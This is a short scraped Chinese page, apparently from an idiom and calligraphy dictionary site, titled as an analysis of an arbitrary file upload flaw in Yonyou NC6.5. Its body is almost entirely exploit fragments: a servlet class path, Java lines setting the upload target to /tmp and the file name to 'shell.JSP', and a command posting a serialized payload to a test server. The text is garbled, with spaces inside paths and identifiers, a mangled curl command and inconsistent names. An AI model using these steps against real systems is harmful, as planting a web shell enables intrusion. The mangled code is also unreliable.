當前位置:成語大全網 - 書法字典 - 用友NC6.5任意文件上傳漏洞分析

用友NC6.5任意文件上傳漏洞分析

home/modules/uapss/lib/pubu apss _ fwsearchIILevel-1 . jar!/com/yon you/ante/servlet/filereceiveservlet . class

ByteArrayOutputStream out team = new ByteArrayOutputStream();

map hashMap = new hashMap();

hashmap . put(“TARGET _ FILE _ PATH“,“/tmp“);

hashmap . put(“FILE _ NAME“,“shell . JSP“);

URL-X POST-data-binary @ exp . ser http://127 . 0 . 0 . 1:9090/test